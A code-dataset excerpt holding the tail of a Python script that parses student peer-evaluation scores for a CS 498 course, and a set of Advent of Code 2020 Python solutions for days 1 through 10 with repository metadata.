get_score(curr_line)\n # to keep track of what other students gave each other\n students[curr_student].teammates[owner] = get_score(curr_line)\n findScore = False\n\n # finding a netid\n if foundOwner is False and curr_line in students:\n foundOwner = True\n owner = curr_line\n curr_student = curr_line\n elif foundOwner is True and curr_line in students:\n # have found owner, on next iteration must get scores\n curr_student = curr_line\n findScore = True\n else:\n # file isn't the wanted peer evaluation file\n break\n continue\n else:\n # file isn't a txt file, whatever\n continue\n\n\ndef formattingForCompass(ownScore, teamAvg, teamnum):\n teamAvg = math.ceil(teamAvg) if (math.ceil(teamAvg) - teamAvg > 0.5) else math.floor(teamAvg)\n formattedStr = \"Team members' perception of your contribution for Assignment 1: {:0.1f}% (averaged) \\n\".format(teamAvg) \\\n + \"Your perception of your own contribution for Assignment 1: {}%\".format(ownScore)\n\n if ownScore < round(teamAvg):\n formattedStr += \"\\n\\nYou might be under-valuing the contribution that you are making to the team.\"\n elif teamAvg < ownScore:\n formattedStr += \"\\n\\nYou might need to make additional contributions to the team in future assignments or \" \\\n \"you might need to better demonstrate or communicate the contributions that you are making \" \\\n \"to the assignments.\"\n\n if ownScore < (100 / int(teams[teamnum])) and teamAvg < (100 / int(teams[teamnum])):\n formattedStr += \"\\nYou probably need to make additional contributions to the team assignments in the future.\"\n\n formattedStr += \"\\n\\nThis is some auto-generated text to help you interpret the scores you have received.\";\n\n return formattedStr\n\n\ndef main():\n students_w_no_submission = []\n no_teammates = []\n\n # sort students dictionary by netid\n sortedStudents = collections.OrderedDict(sorted(students.items()))\n\n for key in sortedStudents:\n curr_student = students[key]\n if curr_student.num_teammates != 0:\n if (curr_student.own == 0):\n students_w_no_submission.append(key)\n print(\"{} || Team #: {}, Number of teammates: {}\".format(key.upper(), curr_student.team, curr_student.num_teammates))\n for member, grade in curr_student.teammates.items():\n print(member + \": \" + str(grade) + \" \", end=\" \")\n print(\"\\nOwn Score: {}, Team Avg: {}\\n\".format(curr_student.own, curr_student.other / curr_student.num_teammates))\n else:\n no_teammates.append(key)\n\n # print students w/ submission issues\n print(\"\\nFollowing are the students who didn't give themselves a score or did not submit:\")\n for student in students_w_no_submission:\n print(student)\n\n # no teammates / probably an error due to the parser\n print(\"\\nFollowing students have no teammates:\")\n for student in no_teammates:\n print(student)\n\n # write to a txt file w/ everything formatted and ready to copy and paste to compass\n f = open('cs498compassformat.txt', 'w')\n for key in sortedStudents:\n student = students[key]\n f.write(key + \"\\n\")\n if student.num_teammates != 0:\n f.write(formattingForCompass(student.own, student.other / student.num_teammates, student.team) + \"\\n\\n\")\n f.close()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7928571701049805, "avg_line_length": 79, "blob_id": "ec0ad625f557c1f8cb6dc0ddc9c06987d01a4fd8", "content_id": "96cfad34d195edcb5dc21f8fff0cdd4ae7698806", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 560, "license_type": "no_license", "max_line_length": 176, "num_lines": 7, "path": "/README.md", "repo_name": "ayshih2/cs498midparser", "src_encoding": "UTF-8", "text": "# Parser for peer evaluations in CS 498 Mobile Interactive Design\n\n* probably (def) v inefficient bc i implemented things just to make grading (hopefully) easier\n* 8 teams are hard coded in\n* prints netid, team number, teammates and the scores given to individual, averaged score and own score to console\n* writes formatted version (ready to be copy and pasted to Compass) to a file\n* basic idea was to read all students in from csv file, then go through individual peer evaluations to find grade they gave to themselves and average grades others gave to them\n" } ]
2
akx/aoc2020
https://github.com/akx/aoc2020
8f961c4d85d9c0dc65b11f9df46e998f68373d06
c59bcd151eb0ab698b6a764943ba9c8d40684cf3
3bb48755b51ee8d1ac1c285f8b1028c41930ea22
refs/heads/master
2023-01-29T07:14:14.014092
2020-12-10T08:15:42
2020-12-10T08:15:42
317,480,487
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4801980257034302, "alphanum_fraction": 0.49504950642585754, "avg_line_length": 22.764705657958984, "blob_id": "78e8b3c5a04a2aa5ccd0336d32d1f2d58e7cdf47", "content_id": "3d1f275983206ed967df3a248390ad4002784ff1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 51, "num_lines": 17, "path": "/py/d09p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d09lib import read_d09, get_weakness\n\n\ndef main():\n secret = get_weakness()\n values = list(read_d09())\n for a in range(len(values)):\n for b in range(a, len(values)):\n val_range = values[a:b]\n if sum(val_range) == secret:\n x = min(val_range) + max(val_range)\n print(x)\n return\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6003289222717285, "alphanum_fraction": 0.6151315569877625, "avg_line_length": 25.434782028198242, "blob_id": "7aef05b4e3b9013f2da2361370e080a2c531b2c0", "content_id": "ed70786d8ecdf7e67e7bbc7ea4ca67e69839b0c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 71, "num_lines": 23, "path": "/py/d09lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from collections import deque\nfrom itertools import combinations\n\n\ndef read_d09(filename=\"../inputs/d09-input.txt\"):\n values = []\n with open(filename) as f:\n for l in f:\n values.append(int(l))\n return values\n\n\ndef get_weakness():\n values = deque(read_d09())\n preamble_length = 25\n buffer = deque(maxlen=preamble_length)\n while len(buffer) < preamble_length:\n buffer.append(values.popleft())\n while values:\n val = values.popleft()\n if not any(a + b == val for (a, b) in combinations(buffer, 2)):\n return val\n buffer.append(val)\n" }, { "alpha_fraction": 0.6785714030265808, "alphanum_fraction": 0.7214285731315613, "avg_line_length": 34, "blob_id": "cb8ec034f83216831bb2a521c5a787a5249b03fd", "content_id": "126ccebff1cabc16c920698c1db8f1b532381cc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 70, "num_lines": 4, "path": "/py/d04p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d04lib import read_d04, required_fields\n\npassports = read_d04()\nprint(len([p for p in passports if set(p.keys()) >= required_fields]))\n" }, { "alpha_fraction": 0.584782600402832, "alphanum_fraction": 0.602173924446106, "avg_line_length": 19, "blob_id": "69a710c404931ecdbba99dcecec6a60949b9b313", "content_id": "216282fdf67d27bc481c0bb199b6a89bd8c01f63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 460, "license_type": "no_license", "max_line_length": 69, "num_lines": 23, "path": "/py/d07p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from typing import Iterable\n\nfrom d07lib import read_d07, BagSpec\n\nbag_data = read_d07()\n\n\ndef recurse_bags(next: Iterable[BagSpec]):\n for bag_spec in next:\n for x in range(bag_spec.count):\n yield bag_spec.color\n yield from recurse_bags(bag_data.get(bag_spec.color, []))\n\n\ndef main():\n total = 0\n for bag in recurse_bags(bag_data[\"shiny gold\"]):\n total += 1\n print(total)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5381165742874146, "alphanum_fraction": 0.573991060256958, "avg_line_length": 17.58333396911621, "blob_id": "2026540b9b8c95395b4e4d0f137859edb664be9a", "content_id": "bc3987fe725d17725705ffd233056c528df42ca8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 50, "num_lines": 12, "path": "/py/d08p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d08lib import read_d08, State, run_until_loop\n\n\ndef main():\n ops = read_d08()\n state = State(opc=0, acc=0)\n rv = run_until_loop(state, ops)\n print(\"final state\", rv)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.47838616371154785, "alphanum_fraction": 0.5273775458335876, "avg_line_length": 18.27777862548828, "blob_id": "7f4a8ed15ab5452329e384d35e033eaea6827ca8", "content_id": "57d78a09ff73f394ff56e54e74771268323fd6ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 347, "license_type": "no_license", "max_line_length": 49, "num_lines": 18, "path": "/py/d10p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d10lib import read_d10\n\n\ndef main():\n inputs = sorted(read_d10())\n deltas = []\n last = 0\n while inputs:\n curr = inputs.pop(0)\n deltas.append(curr - last)\n last = curr\n d1 = deltas.count(1)\n d3 = deltas.count(3) + 1 # lol, fudge factor\n print(d1, d3, d1 * d3)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6391304135322571, "alphanum_fraction": 0.6695652008056641, "avg_line_length": 24.55555534362793, "blob_id": "0523734c953b6ffda61c0d013bc3b2eac202a3da", "content_id": "8de7c86e8a088ffc5da6f7ac470f54c18d47ac8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 230, "license_type": "no_license", "max_line_length": 74, "num_lines": 9, "path": "/py/d06p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d06lib import read_d06\nfrom collections import Counter\n\ngroups = read_d06()\ntotal = 0\nfor g in groups:\n counter = Counter(\"\".join(g))\n total += len([ans for (ans, cnt) in counter.items() if cnt == len(g)])\nprint(total)\n" }, { "alpha_fraction": 0.42146891355514526, "alphanum_fraction": 0.49152541160583496, "avg_line_length": 23.58333396911621, "blob_id": "5478baade9b4fe776bca73c0757200e375cb2eeb", "content_id": "67c028ea5ff94866750c2644c48f119692e6b321", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 62, "num_lines": 36, "path": "/py/d05lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from math import ceil\n\n\ndef decode_to_coords(bsp):\n x0 = y0 = 0\n y1 = 127\n x1 = 8\n for c in bsp:\n assert y1 >= y0\n if c == \"F\":\n y1 = y0 + (y1 - y0) // 2\n elif c == \"B\":\n y0 = y0 + ceil((y1 - y0) / 2)\n elif c == \"L\":\n x1 = x0 + (x1 - x0) // 2\n elif c == \"R\":\n x0 = x0 + ceil((x1 - x0) / 2)\n assert y1 - y0 <= 1\n assert x1 - x0 <= 1\n return min(x0, x1), min(y0, y1)\n\n\ndef coords_to_seat_id(coords):\n return coords[1] * 8 + coords[0]\n\n\ndef test_decode(bsp, real_coords, real_seat_id):\n coords = decode_to_coords(bsp)\n seat_id = coords_to_seat_id(coords)\n print(bsp, (coords, real_coords), (seat_id, real_seat_id))\n\n\nif __name__ == \"__main__\":\n test_decode(\"FBFBBFFRLR\", (5, 44), 357)\n test_decode(\"FFFBBBFRRR\", (7, 14), 119)\n test_decode(\"BFFFBBFRRR\", (7, 70), 567)\n" }, { "alpha_fraction": 0.5091575384140015, "alphanum_fraction": 0.5384615659713745, "avg_line_length": 23.81818199157715, "blob_id": "e13223dc45dae275f93e4a3033e55876430e917c", "content_id": "365c00bf78087b40f82edbda4e4766a149f38b7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 273, "license_type": "no_license", "max_line_length": 57, "num_lines": 11, "path": "/py/d06lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "def read_d06():\n SEP = chr(30)\n with open(\"../inputs/d06-input.txt\") as f:\n data = f.read()\n data = data.replace(\"\\n\\n\", SEP)\n groups = [group.split() for group in data.split(SEP)]\n return groups\n\n\nif __name__ == \"__main__\":\n print(read_d06())\n" }, { "alpha_fraction": 0.6580796241760254, "alphanum_fraction": 0.6674473285675049, "avg_line_length": 27.46666717529297, "blob_id": "fb229da2cedfbad1b04749c6d074164c3a51ceb9", "content_id": "eb1c46c921c26c9582d23b5cbc5e1384c8cfacfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 427, "license_type": "no_license", "max_line_length": 80, "num_lines": 15, "path": "/py/d05p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d05lib import decode_to_coords, coords_to_seat_id\n\ncode_to_coords = {\n bsp: decode_to_coords(bsp) for bsp in open(\"../inputs/d05-input.txt\") if bsp\n}\ncode_to_seat_id = {\n bsp: coords_to_seat_id(coords) for (bsp, coords) in code_to_coords.items()\n}\n\nseats = set(code_to_seat_id.values())\nmin_seat = min(seats)\nmax_seat = max(seats)\nfor seat in range(min_seat, max_seat):\n if seat not in seats:\n print(seat)\n" }, { "alpha_fraction": 0.45768025517463684, "alphanum_fraction": 0.48275861144065857, "avg_line_length": 18.9375, "blob_id": "a08f874029a791171f1e0f1bba1bceefb8e83573", "content_id": "4aa17532fd2733848d2b5ed8f5f63f54936e8344", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/py/d03p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "trees = set()\nfor y, line in enumerate(open(\"../inputs/d03-input.txt\")):\n for x, c in enumerate(line):\n if c == \"#\":\n trees.add((x, y))\nmax_y = y\nmax_x = x\nx, y = 0, 0\ndx, dy = 3, 1\ncount = 0\nwhile y <= max_y:\n if (x % max_x, y) in trees:\n count += 1\n x += dx\n y += dy\nprint(count)\n" }, { "alpha_fraction": 0.5015197396278381, "alphanum_fraction": 0.5501520037651062, "avg_line_length": 26.41666603088379, "blob_id": "63e4facde22170fd9f4018fc558e76f8c0b0a46b", "content_id": "c979b5d5a9dddf257d6da832dae31d8cff86d492", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 60, "num_lines": 12, "path": "/py/d02p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import re\n\npw_re = re.compile(\"^(\\d+)-(\\d+) (.): (.+)$\")\n\ncount = 0\nfor line in open(\"../inputs/d02-input.txt\"):\n pos1, pos2, chr, pw = pw_re.match(line.strip()).groups()\n pos1ok = pw[int(pos1) - 1] == chr\n pos2ok = pw[int(pos2) - 1] == chr\n if (pos1ok or pos2ok) and pos1ok ^ pos2ok:\n count += 1\nprint(count)\n" }, { "alpha_fraction": 0.5199999809265137, "alphanum_fraction": 0.5360000133514404, "avg_line_length": 24, "blob_id": "34030b77e8cff61f66a15a7cdd7896e28bba21c9", "content_id": "35b4add5281eac77646a267a1f8176cf1a43ad91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 58, "num_lines": 10, "path": "/py/d02p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import re\n\npw_re = re.compile(\"^(\\d+)-(\\d+) (.): (.+)$\")\n\ncount = 0\nfor line in open(\"../inputs/d02-input.txt\"):\n min, max, chr, pw = pw_re.match(line.strip()).groups()\n if int(min) <= pw.count(chr) <= int(max):\n count += 1\nprint(count)\n" }, { "alpha_fraction": 0.6689189076423645, "alphanum_fraction": 0.6824324131011963, "avg_line_length": 31.88888931274414, "blob_id": "6ad3a085256db474f70ad1c033f82ac49580cd0c", "content_id": "abaf50136b9316862c72780babc09e67437d792a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/py/d05p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d05lib import decode_to_coords, coords_to_seat_id\n\ncode_to_coords = {\n bsp: decode_to_coords(bsp) for bsp in open(\"../inputs/d05-input.txt\") if bsp\n}\ncode_to_seat_id = {\n bsp: coords_to_seat_id(coords) for (bsp, coords) in code_to_coords.items()\n}\nprint(max(code_to_seat_id.values()))\n" }, { "alpha_fraction": 0.4909420311450958, "alphanum_fraction": 0.5144927501678467, "avg_line_length": 26.600000381469727, "blob_id": "0676e6b060472cc60002eeb0998717bd3bef9dcf", "content_id": "f45a1f7d4d86a76a11698354119e510c1918edb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 68, "num_lines": 20, "path": "/py/d08p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d08lib import read_d08, State, run_until_loop\n\n\ndef main():\n orig_ops = tuple(read_d08())\n *_, cand_ops = run_until_loop(State(opc=0, acc=0), orig_ops)\n for i in cand_ops:\n if orig_ops[i][0] == \"acc\":\n continue\n ops = list(orig_ops)\n ops[i] = (\"jmp\" if ops[i][0] == \"nop\" else \"nop\", ops[i][1])\n state = State(opc=0, acc=0)\n final_state, finished, _ = run_until_loop(state, ops)\n if finished:\n print(i, final_state)\n break\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6224489808082581, "alphanum_fraction": 0.6836734414100647, "avg_line_length": 23.5, "blob_id": "f4fd1113277cc126b6d0a2611a0d20ca72bc0c9b", "content_id": "ee3fbb260c7d94bc5cbdb3d5990a7dba5dce80ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/py/d06p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d06lib import read_d06\n\ngroups = read_d06()\nprint(sum(len(set(\"\".join(g))) for g in groups))\n" }, { "alpha_fraction": 0.4709762632846832, "alphanum_fraction": 0.49208444356918335, "avg_line_length": 20.657142639160156, "blob_id": "5198931a469b1aad2988c17f2c27aa97a2cc8b56", "content_id": "9e8b8b0ee843909bfa0042ac7a650575c4f82bf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 758, "license_type": "no_license", "max_line_length": 63, "num_lines": 35, "path": "/py/d03p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from functools import reduce\nfrom operator import mul\n\n\ndef main():\n max_x, max_y, trees = read()\n counts = []\n for dx, dy in (1, 1), (3, 1), (5, 1), (7, 1), (1, 2):\n counts.append(count_trees(max_x, max_y, trees, dx, dy))\n mul_count = reduce(mul, counts)\n print(mul_count)\n\n\ndef count_trees(max_x, max_y, trees, dx, dy):\n x, y = 0, 0\n count = 0\n while y <= max_y:\n if (x % max_x, y) in trees:\n count += 1\n x += dx\n y += dy\n return count\n\n\ndef read():\n trees = set()\n for y, line in enumerate(open(\"../inputs/d03-input.txt\")):\n for x, c in enumerate(line):\n if c == \"#\":\n trees.add((x, y))\n return x, y, trees\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5676998496055603, "alphanum_fraction": 0.6215334534645081, "avg_line_length": 28.190475463867188, "blob_id": "fb4701fd940ae63e4c5e875453b7ad44a5f154f9", "content_id": "19171920db731c8556aa5d13e926cc457d4ec306", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 94, "num_lines": 21, "path": "/py/d10p02alt.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import d10lib\n\n\ndef get_result(inputs):\n # via https://www.reddit.com/r/adventofcode/comments/ka8z8x/2020_day_10_solutions/gf9b0zz/\n # https://github.com/bvandewalle/aoc2020/blob/master/10/main.go\n accum = {0: 1}\n for i in inputs:\n accum[i] = accum.get(i - 1, 0) + accum.get(i - 2, 0) + accum.get(i - 3, 0)\n return accum[inputs[-1]]\n\n\ndef main():\n inputs = sorted(d10lib.read_d10())\n inputs.append(inputs[-1] + 3) # built-in adapter\n assert len(set(inputs)) == len(inputs) # sanity check for no duplicates\n print(get_result(inputs))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5138055086135864, "alphanum_fraction": 0.5690276026725769, "avg_line_length": 25.03125, "blob_id": "c8ff6dc06d9dc9883ad8f04c09f1ff00e56d13ac", "content_id": "38a2d763705dc9e98994f659b4fd11c063b821b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 833, "license_type": "no_license", "max_line_length": 88, "num_lines": 32, "path": "/py/d04p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from string import hexdigits\n\nfrom d04lib import read_d04, good_ecl, required_fields\n\n\ndef validate_hgt(x):\n if x.endswith(\"in\"):\n return 59 <= int(x[:-2]) <= 76\n if x.endswith(\"cm\"):\n return 150 <= int(x[:-2]) <= 193\n return False\n\n\nvalidators = {\n \"byr\": lambda x: 1920 <= int(x) <= 2002,\n \"iyr\": lambda x: 2010 <= int(x) <= 2020,\n \"eyr\": lambda x: 2020 <= int(x) <= 2030,\n \"hgt\": validate_hgt,\n \"hcl\": lambda x: len(x) == 7 and x[0] == \"#\" and all(c in hexdigits for c in x[1:]),\n \"ecl\": lambda x: x in good_ecl,\n \"pid\": lambda x: len(x) == 9 and x.isdigit(),\n \"cid\": lambda x: True,\n}\n\npassports = read_d04()\npassports = [\n p\n for p in passports\n if set(p.keys()) >= required_fields\n and all(validators[key](value) for (key, value) in p.items())\n]\nprint(len(passports))\n" }, { "alpha_fraction": 0.5601577758789062, "alphanum_fraction": 0.5739644765853882, "avg_line_length": 21.04347801208496, "blob_id": "25d48edeae5434fc6da0a49dcc79137ad1b4dd71", "content_id": "4ea7c35de10b6f7766eec9cc0fd4e6e40209ab94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 78, "num_lines": 23, "path": "/py/d07p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d07lib import read_d07\n\nbag_data = read_d07()\n\n\ndef iter_paths(color, path=()):\n has_next = bag_data.get(color, [])\n yield path\n for next_spec in has_next:\n yield from iter_paths(next_spec.color, path=path + (next_spec.color,))\n\n\ndef main():\n roots = set()\n for root_color in bag_data:\n for path in iter_paths(root_color):\n if path and path[-1] == \"shiny gold\":\n roots.add(root_color)\n print(len(roots))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5471522212028503, "alphanum_fraction": 0.5536881685256958, "avg_line_length": 21.787233352661133, "blob_id": "9d554b9ba7793264daabb435f83b5f6a9ef52f19", "content_id": "219cc5734ad5308c9ea1f538b2dac9999425e2b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1071, "license_type": "no_license", "max_line_length": 49, "num_lines": 47, "path": "/py/d08lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from dataclasses import dataclass, replace\n\n\ndef read_d08(filename=\"../inputs/d08-input.txt\"):\n ops = []\n with open(filename) as f:\n for l in f:\n op, val = l.split(None, 1)\n val = int(val)\n ops.append((op, val))\n return ops\n\n\n@dataclass(frozen=True)\nclass State:\n acc: int\n opc: int\n\n def jmp(self, val):\n return replace(self, opc=self.opc + val)\n\n def modify_acc(self, val):\n return replace(self, acc=self.acc + val)\n\n\ndef run_op(state: State, opt):\n op, val = opt\n if op == \"nop\":\n return state.jmp(1)\n if op == \"acc\":\n return state.modify_acc(val).jmp(1)\n if op == \"jmp\":\n return state.jmp(val)\n raise NotImplementedError(\"...\")\n\n\ndef run_until_loop(state, ops):\n opids_seen = set()\n reason = \"finish\"\n while state.opc < len(ops):\n op = ops[state.opc]\n if state.opc in opids_seen:\n reason = \"loop\"\n break\n opids_seen.add(state.opc)\n state = run_op(state, op)\n return (state, reason, opids_seen)\n" }, { "alpha_fraction": 0.4372294247150421, "alphanum_fraction": 0.46320345997810364, "avg_line_length": 32, "blob_id": "5c5ebe3388b851f88eee6c076844d37c83d33894", "content_id": "a4865ff80cd90884af28516d787bd64fada3f49b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 45, "num_lines": 7, "path": "/py/d01p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "with open(\"d01-input.txt\", \"r\") as f:\n entries = [int(ent.strip()) for ent in f]\n for i, a in enumerate(entries):\n for b in entries[:i]:\n if a + b == 2020:\n print(a * b)\n break\n" }, { "alpha_fraction": 0.4623015820980072, "alphanum_fraction": 0.4761904776096344, "avg_line_length": 20, "blob_id": "c039ce8188b19b3b65ffdf652f14239ba8232b11", "content_id": "8584933ca6a2e10cd3b1c58b88c2d34190591b37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 504, "license_type": "no_license", "max_line_length": 60, "num_lines": 24, "path": "/py/d04lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "def read_d04():\n SEP = chr(30)\n with open(\"../inputs/d04-input.txt\") as f:\n data = f.read()\n data = data.replace(\"\\n\\n\", SEP)\n data = data.replace(\"\\n\", \" \")\n passports = [\n dict(sorted(p.split(\":\", 1) for p in row))\n for row in (raw.split() for raw in data.split(SEP))\n ]\n return passports\n\n\ngood_ecl = {\"amb\", \"blu\", \"brn\", \"gry\", \"grn\", \"hzl\", \"oth\"}\n\nrequired_fields = {\n \"byr\",\n \"iyr\",\n \"eyr\",\n \"hgt\",\n \"hcl\",\n \"ecl\",\n \"pid\",\n}\n" }, { "alpha_fraction": 0.5299714803695679, "alphanum_fraction": 0.5375832319259644, "avg_line_length": 24.634145736694336, "blob_id": "3666a888b878240622a96ae948efceb9bf95d1ad", "content_id": "487c8af870f53c530990b2bcbe61c58dfd4d424c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1051, "license_type": "no_license", "max_line_length": 83, "num_lines": 41, "path": "/py/d07lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import re\nfrom dataclasses import dataclass\n\nline_re = re.compile(r\"^(?P<source>.+?) contain (?P<dest>.+?)\\.$\")\nbag_re = re.compile(r\"(?P<count>\\d+)?\\s*(?P<color>[^,]+) bag[s]?\")\n\n\n@dataclass\nclass BagSpec:\n count: int\n color: str\n\n\ndef to_bagspecs(s):\n for atom in re.split(\",\\s*\", s):\n bag = bag_re.match(atom)\n if not bag:\n print(atom)\n raise NotImplementedError(\"...\")\n if bag.group(0) == \"no other bags\":\n continue\n yield BagSpec(count=int(bag.group(\"count\") or 1), color=bag.group(\"color\"))\n\n\ndef read_d07(filename=\"../inputs/d07-input.txt\"):\n bag_specs = {}\n with open(filename) as f:\n for line in f:\n m = line_re.match(line)\n assert m\n src, dest = m.groups()\n src_bag = next(to_bagspecs(src)).color\n dest_bags = list(to_bagspecs(dest))\n assert src_bag not in bag_specs\n bag_specs[src_bag] = dest_bags\n return bag_specs\n\n\nif __name__ == \"__main__\":\n x = read_d07()\n print(x)\n" }, { "alpha_fraction": 0.5040983557701111, "alphanum_fraction": 0.5327869057655334, "avg_line_length": 29.5, "blob_id": "94d291416188341aca4364c278284cd5714b043f", "content_id": "da98bf3a9c14cbb4a8eeec4478f26202669bf24c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 244, "license_type": "no_license", "max_line_length": 54, "num_lines": 8, "path": "/py/d01p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import itertools\n\nwith open(\"../inputs/d01-input.txt\", \"r\") as f:\n entries = [int(ent.strip()) for ent in f]\n for a, b, c in itertools.combinations(entries, 3):\n if a + b + c == 2020:\n print(a * b * c)\n break\n" }, { "alpha_fraction": 0.5816733241081238, "alphanum_fraction": 0.6015936136245728, "avg_line_length": 24.965517044067383, "blob_id": "7402e757e6d9240af3345d6417247d1eeea77bad", "content_id": "5dc42e90f823d4a570b76bf9f9d51a631d6d2cd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 753, "license_type": "no_license", "max_line_length": 76, "num_lines": 29, "path": "/py/d10p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from typing import List\n\nimport d10lib\n\n\ndef walk_combos(adapters: List[int], start_index: int, cache: dict):\n if start_index in cache:\n return cache[start_index]\n n = 0\n for next_index in range(start_index + 1, len(adapters)):\n if adapters[next_index] - adapters[start_index] <= 3:\n n += walk_combos(adapters, next_index, cache)\n else:\n break\n n = n or 1\n cache[start_index] = n\n return n\n\n\ndef main():\n inputs = sorted(d10lib.read_d10())\n inputs.insert(0, 0) # virtual zero\n inputs.append(inputs[-1] + 3) # built-in adapter\n assert len(set(inputs)) == len(inputs) # sanity check for no duplicates\n print(walk_combos(inputs, 0, {}))\n\n\nif __name__ == \"__main__\":\n main()\n" } ]
26
wsong5077/Connect-4-Board-Game
https://github.com/wsong5077/Connect-4-Board-Game
de1f684775465c4f3f4ab251b548257bf1015692
4280e0782396c59362ad4d44aa99f3a89032d1ad
f8400ba0f797a423fe4db0f65e2dbfaf078ea44f
refs/heads/main
2023-02-11T02:50:00.560045
2021-01-16T07:38:57
2021-01-16T07:38:57
330,109,719
0
0
null
null
null
null
null
